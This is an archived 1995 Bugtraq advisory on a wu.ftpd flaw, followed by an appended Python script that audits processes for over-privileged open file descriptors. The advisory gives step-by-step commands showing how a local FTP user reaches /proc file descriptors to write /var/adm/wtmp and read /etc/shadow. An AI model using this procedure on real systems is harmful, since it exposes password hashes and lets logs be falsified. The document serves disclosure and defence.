Bugtraq mailing list archives
Security Problem ftpd (includes wu.ftpd 2.4 and 2.4.2 beta 4)
From: H.Karrenbeld () ct utwente nl (Henri Karrenbeld)
Date: Wed, 12 Jul 1995 13:34:10 +0100
Description:

People with local ftp access can use the file descriptors in /proc of the (wu.)ftpd process (which is running under their euid) to read and append to files to which they should not have access. This gives write permission to /var/adm/wtmp and read access to /etc/shadow, if your ftpd is hacked in a 'dirty' way to incorporate shadow passwords. The 2.4 version also gave write access to /var/adm/xferlog. A friend of mine reported write access to /etc/ftpconversions (with possible root vulnerabilities), but I have not been able to repeat that (2.4.2 beta 4 appears to be safe in this).

How to show your sysadmin it works (test done with 2.4.2 beta):

  $ ftp -n localhost
  user: <yourname>
  password: <yourpassword>
  ftp> <ctrl-Z>

Now find the process id of the wu.ftpd running:

  $ ps -alxw |grep <yourname>
  0 502 2728 46 1 0 527 396 1416fc S ? 0:00 -loopback: <yourname>
        ^
        +---- this is the one!

  $ cd /proc/2728/fd
  $ ls -lG
  total 0
  lrwx------ 1 <yourname> 64 Jul 12 13:07 0 -> [0000]:0
  lrwx------ 1 <yourname> 64 Jul 12 13:07 1 -> [0000]:0
  l-wx------ 1 <yourname> 64 Jul 12 13:07 2 -> [0301]:4141
  lrwx------ 1 <yourname> 64 Jul 12 13:07 3 -> [0000]:0
  -r-x------ 1 <yourname> 64 Jul 12 13:07 4 -> [0301]:92276
  l-wx------ 1 <yourname> 64 Jul 12 13:07 5 -> [0301]:24718

  $ ls -il /var/adm/wtmp
  24718 -rw-r--r-- 1 root root 183911 Jul 12 13:04 /var/adm/wtmp

So normal access for wtmp is 644, however this 'hard link' into the filesystem points directly to the inode (24718) and gives you write access to this file by writing to /proc/2728/fd/5 instead of to /var/adm/wtmp.

If your wu.ftpd has implemented shadow passwords in a 'dirty' way, there is also a file descriptor for /etc/shadow (only this is lr-x, but it still defeats the entire idea of having a shadow password file).

Other versions of wu.ftpd or other setups might have more or other fd's opened (/etc/ftpusers, /etc/ftpaccess, etc. etc.) but those have not shown write access on all systems I checked (wu.ftpd 2.4 and 2.4.2 beta, with linux kernels 1.2.1, 1.2.3, 1.2.8 and 1.2.9).

How to fix?

I'm afraid I don't have enough skills to fix this myself, obviously it involves opening and closing the /var/adm/wtmp after it has been written to, so the file descriptor will not be in the /proc filesystem anymore, however there might be a possible race condition here (actually you could consider this also a race condition, only a very slow one ;-). While this is a feasible solution for the use of /var/adm/wtmp, which is only accessed at login or logoff from ftp, it is not one for /var/adm/xferlog, however upgrading to 2.4.2 beta 4 (or above) will probably solve the problem for illegal access to this file.

Other programs?

Well, all the Linux machines I have access to use wu.ftpd, however you should not be surprised if this trick also works with ftpd of other origin. Your mileage may vary. $)

Henri
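An audit for the condition reported in the message above, as an added example that is not part of the original post or of wu.ftpd: it lists regular files a process holds open with more access than its effective uid could obtain by opening the path itself. It assumes a current Linux /proc layout (`status`, `fdinfo`), looks at classic mode bits only (no ACLs or capabilities), and the function names are hypothetical.

```python
import os, stat, sys

def allowed(st_mode, st_uid, st_gid, euid, gids):
    """(can_read, can_write) for euid under classic owner/group/other bits."""
    if euid == 0:
        return True, True
    if euid == st_uid:
        r, w = stat.S_IRUSR, stat.S_IWUSR
    elif st_gid in gids:
        r, w = stat.S_IRGRP, stat.S_IWGRP
    else:
        r, w = stat.S_IROTH, stat.S_IWOTH
    return bool(st_mode & r), bool(st_mode & w)

def excess(open_flags, st_mode, st_uid, st_gid, euid, gids):
    """Access the descriptor holds that euid could not get by open()."""
    acc = open_flags & 3                      # O_ACCMODE: 0=RDONLY 1=WRONLY 2=RDWR
    can_r, can_w = allowed(st_mode, st_uid, st_gid, euid, gids)
    held = (("read", acc in (0, 2), can_r), ("write", acc in (1, 2), can_w))
    return {name for name, holds, can in held if holds and not can}

def audit(pid):
    """Yield (fd, target, excess_set) for regular files open in process pid."""
    ids = {}
    with open(f"/proc/{pid}/status") as f:
        for line in f:
            key, _, val = line.partition(":")
            if key in ("Uid", "Gid", "Groups"):
                ids[key] = [int(x) for x in val.split()]
    euid = ids["Uid"][1]                      # fields: real, effective, saved, fs
    gids = set(ids.get("Groups", [])) | {ids["Gid"][1]}
    fd_dir = f"/proc/{pid}/fd"
    for fd in sorted(os.listdir(fd_dir), key=int):
        try:
            st = os.stat(f"{fd_dir}/{fd}")    # follows the link to the open file
            target = os.readlink(f"{fd_dir}/{fd}")
            with open(f"/proc/{pid}/fdinfo/{fd}") as f:
                flags = next(int(l.split()[1], 8) for l in f if l.startswith("flags:"))
        except (OSError, StopIteration):      # descriptor closed while scanning
            continue
        if stat.S_ISREG(st.st_mode):
            extra = excess(flags, st.st_mode, st.st_uid, st.st_gid, euid, gids)
            if extra:
                yield int(fd), target, extra

if __name__ == "__main__":
    for fd, target, extra in audit(int(sys.argv[1])):
        print(f"fd {fd} -> {target}: holds {', '.join(sorted(extra))} beyond euid's rights")
```

Run it as root against the pid of a daemon that has switched to a user's euid; any line it prints is a descriptor opened before the switch and never closed.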